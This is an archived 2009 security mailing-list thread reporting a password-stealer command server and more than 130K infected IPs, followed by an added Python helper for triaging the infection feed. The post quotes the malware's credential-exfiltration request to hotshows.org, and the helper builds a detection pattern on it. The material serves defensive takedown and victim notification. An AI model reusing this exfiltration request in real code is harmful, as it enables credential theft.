[nsp-sec] ACK AS 1221 RE: 130K+ Infected Ips on ~3600 ASNs
Chisholm, Glenn L
Glenn.L.Chisholm at team.telstra.com
Thu Oct 1 19:23:32 EDT 2009
Many thanks as always.
Glenn Chisholm
General Manager, Network Security
This communication may contain CONFIDENTIAL information of Telstra Corporation Limited (ABN 33 051 775 556). It may also be the subject of LEGAL PROFESSIONAL PRIVILEGE and/or under copyright. If you are not an intended recipient, you MUST NOT keep, forward, copy, use, save or rely on this communication, and any such action is unauthorised and prohibited. If you have received this communication in error, please reply to this e-mail to notify the sender of its incorrect delivery, and then delete both it and your reply.
-----Original Message-----
From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
Sent: Friday, 2 October 2009 3:48 AM
To: NSP-SEC List
Subject: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs
----------- nsp-security Confidential --------
Hi Team,
This password stealer head end IP appears to be quite busy:
76.73.37.250
We're working w/ the ISP on takedown, however in the meantime here is a list
of 130K+ infected IPs seen talking to it primarily via TCP 80 (reporting
stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
takedown to last forever because they can likely re-route via DNS.
ASN list:
https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
Infected IP list:
https://www.cymru.com/nsp-sec/Owned/stealer/
eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
Timestamps in UTC.
Some clarification on the formatting:
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
The timestamp column will begin with a U or a T. U is for UDP, T for TCP.
When possible we've preferred to list out a T if we have seen any TCP 80
traffic from the client IP in question.
It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data will
not match in all cases. I cannot guarantee that the UDP traffic is not part
of some type of actual software but it sure looks suspicious. Here is a
public URL for reference:
http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
As there is UDP involved we cannot guarantee that there are 0 spoofed IPs,
but on the TCP side that is another matter.
HTTP credential stealing looks something like this:
GET /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: hotshows.org
Cheers,
-- steve
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________
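The following is an added example, not code from the post or from Team Cymru: a small Python triage helper for the feed format described above ("ASN | IP | U/T timestamp | AS name") and for the HTTP credential-reporting pattern quoted in the post. It splits a network operator's rows by how far the client IP can be trusted (T rows from TCP sessions, U rows that may be spoofed, and RFC 1918 sources that cannot be attributed to a customer), and it matches a raw request against the GET /pp2/?s=...&u=...&p=... shape without returning the credential values. The sample feed rows other than the MIT line, the ASN set 64496, and the sample request built from the post's pattern are constructed for this example.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample of the feed format described in the post:
#   ASN | client IP | <U|T> YYYY/MM/DD HH:MM:SS.micro (UTC) | AS name
# The first row is the one quoted in the post; the other rows are made up
# for this example (documentation prefixes and one RFC 1918 address).
SAMPLE_FEED = """\
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
64496 | 198.51.100.23 | T 2009/10/01 04:01:12.000001 | EXAMPLE-AS - constructed
64496 | 10.0.0.5 | U 2009/10/01 04:02:30.123456 | EXAMPLE-AS - constructed
64497 | 203.0.113.77 | U 2009/10/01 04:05:00.000000 | OTHER-AS - constructed
"""

# Constructed raw request following the pattern quoted in the post (CRLF line ends).
SAMPLE_REQUEST = (
    "GET /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php"
    "&u=%STOLEN_USERNAME&p=STOLEN_PASSWORD HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible)\r\n"
    "Host: hotshows.org\r\n"
    "\r\n"
)

# RFC 1918 only: ipaddress.is_private would also flag TEST-NET and other
# special-purpose ranges, which is not what the post is talking about.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass
class FeedRow:
    asn: int
    ip: ipaddress.IPv4Address
    proto: str       # "U" (UDP 7006-7012 only) or "T" (TCP 80 seen)
    timestamp: str   # UTC, kept as the feed prints it
    as_name: str


def parse_feed_line(line: str) -> Optional[FeedRow]:
    """Parse one 'ASN | IP | <U|T> timestamp | AS name' row; None if malformed."""
    parts = [p.strip() for p in line.split("|")]
    if len(parts) != 4:
        return None
    asn, ip, ts_field, as_name = parts
    proto, _, ts = ts_field.partition(" ")
    if proto not in ("U", "T") or not ts:
        return None
    try:
        return FeedRow(int(asn), ipaddress.IPv4Address(ip), proto, ts, as_name)
    except ValueError:
        return None


def triage_feed(text: str, my_asns: set) -> dict:
    """Bucket the rows for my ASNs by how much the client IP can be trusted:
    T rows (TCP, hard to spoof) for direct notification, U rows (possibly
    spoofed) for a second look, RFC 1918 sources as unattributable."""
    rows = [r for r in (parse_feed_line(l) for l in text.splitlines()) if r]
    mine = [r for r in rows if r.asn in my_asns]
    rfc1918 = lambda ip: any(ip in net for net in RFC1918)
    return {
        "tcp_confirmed": sorted(str(r.ip) for r in mine if r.proto == "T"),
        "udp_only": sorted(str(r.ip) for r in mine if r.proto == "U" and not rfc1918(r.ip)),
        "unattributable": sorted(str(r.ip) for r in mine if rfc1918(r.ip)),
    }


STEALER_PATH = "/pp2/"
REQUEST_LINE = re.compile(r"^GET\s+(\S+)\s+HTTP/1\.[01]$")


def match_stealer_request(raw: str) -> Optional[dict]:
    """Return {'host', 'stolen_from'} if a raw HTTP request has the
    GET /pp2/?s=<url>&u=<user>&p=<pass> shape quoted in the post, else None.
    The credential values themselves are deliberately not returned."""
    lines = raw.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    url = urlsplit(m.group(1))
    query = parse_qs(url.query, keep_blank_values=True)
    if url.path != STEALER_PATH or not {"s", "u", "p"} <= set(query):
        return None
    headers = {}
    for h in lines[1:]:
        if not h:          # blank line ends the header block
            break
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    # netloc keeps the victim site's case; .hostname would lowercase it
    return {"host": headers.get("host", ""), "stolen_from": urlsplit(query["s"][0]).netloc}


if __name__ == "__main__":
    print(triage_feed(SAMPLE_FEED, {64496}))
    print(match_stealer_request(SAMPLE_REQUEST))
```

The request matcher keys on the path and the presence of the three parameters rather than on the Host header, so a move of the head end to another name (which the post expects once the IP is taken down) does not defeat it; the host is reported alongside the victim site so the operator knows which accounts to have reset.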